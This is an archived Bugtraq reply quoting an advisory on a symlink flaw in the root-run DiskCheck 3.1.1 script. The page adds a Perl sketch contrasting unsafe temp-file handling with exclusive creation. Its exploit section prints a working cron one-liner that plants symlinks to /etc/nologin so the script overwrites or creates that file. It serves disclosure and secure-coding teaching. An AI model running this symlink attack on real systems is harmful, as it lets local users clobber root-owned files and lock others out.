Bugtraq mailing list archives
Re: Diskcheck 3.1.1 Symlink Vulnerability
From: Stan Bubrouski <secnet () CROSSWINDS NET>
Date: Mon, 7 Aug 2000 11:41:49 -0400
At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
Diskcheck 3.1.1 Symlink Vulnerability

1 Introduction

DiskCheck is a Perl script that monitors how much space is available on your hard drive. Basically, it checks your drive space every hour and takes action based on the specifications in the config file /etc/diskcheck.conf. DiskCheck 3.1.1 is available from http://www.kaybee.org/~kirk/html/linux.html and RedHat Powertools 6.x.

2 Vulnerability

The command /etc/cron.hourly/diskcheck.pl is executed with root privilege every hour. It creates a temporary file whose default name, /tmp/diskusagealert.txt.<pid>, defined in /etc/diskcheck.conf, is predictable, and it is willing to follow symbolic links. This may allow malicious local users to create or overwrite arbitrarily named files.

3 Exploit

The following cron job creates the file /etc/nologin.

0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \
    symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }'

4 Solution

Relocate the temporary file into a directory where only root can create a file.

Example) Edit /etc/diskcheck.conf

$tempfile = '/var/local/diskusagealert.txt'

# ls -ld /var/local
drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/

You, Jin-Ho, jhyou () chonnam ac kr

This was reported on the list about a month ago and is fixed in Red Hat's current rawhide, and in Red Hat Pinstripe (7.0 beta). I don't know of any other distros that include it.

-Stan Bubrouski
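
Added example, not part of either message and not DiskCheck's own code: a Perl sketch of the flaw class the advisory describes, contrasting a plain open() on a predictable name with an exclusive create and with File::Temp. The scratch directory, the "victim" file and the sub names are assumptions made for the demonstration; how DiskCheck itself opens its temp file is not shown on this page.

```perl
#!/usr/bin/perl
# Added example: not DiskCheck's code. Shows why a predictable temp name
# opened with plain open() follows a planted symlink, and how an exclusive
# create refuses it. Everything happens inside a private scratch directory.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_CREAT O_EXCL);
use File::Temp qw(tempdir tempfile);

my $scratch = tempdir(CLEANUP => 1);              # stands in for /tmp
my $victim  = "$scratch/victim";                  # stands in for a root-owned file
my $guess   = "$scratch/diskusagealert.txt.$$";   # predictable name, as in the advisory

# Constructed precondition: the predictable name already exists as a symlink.
symlink($victim, $guess) or die "symlink: $!";

# Assumed unsafe pattern: open for writing, which follows the link.
sub unsafe_write {
    my ($path) = @_;
    open(my $fh, '>', $path) or return 0;
    print {$fh} "report\n";
    close($fh);
    return 1;
}

# Hardened: O_CREAT|O_EXCL fails with EEXIST if the name exists at all,
# including when it is a dangling symlink, so nothing is written through it.
sub exclusive_write {
    my ($path) = @_;
    sysopen(my $fh, $path, O_WRONLY | O_CREAT | O_EXCL, 0600) or return 0;
    print {$fh} "report\n";
    close($fh);
    return 1;
}

print "exclusive create on planted link: ",
      (exclusive_write($guess) ? "wrote" : "refused ($!)"), "\n";
print "victim exists after exclusive attempt: ", (-e $victim ? "yes" : "no"), "\n";

unsafe_write($guess);
print "victim exists after plain open: ", (-e $victim ? "yes" : "no"), "\n";

# Preferred: File::Temp picks an unpredictable name and creates it exclusively.
my ($fh, $name) = tempfile('diskusagealert.XXXXXXXX', DIR => $scratch, UNLINK => 1);
print {$fh} "report\n";
close($fh);
print "File::Temp created: $name\n";
```

Moving the file to a root-only directory, as the advisory suggests, removes the attacker's ability to plant the link; the exclusive create removes the script's willingness to follow one.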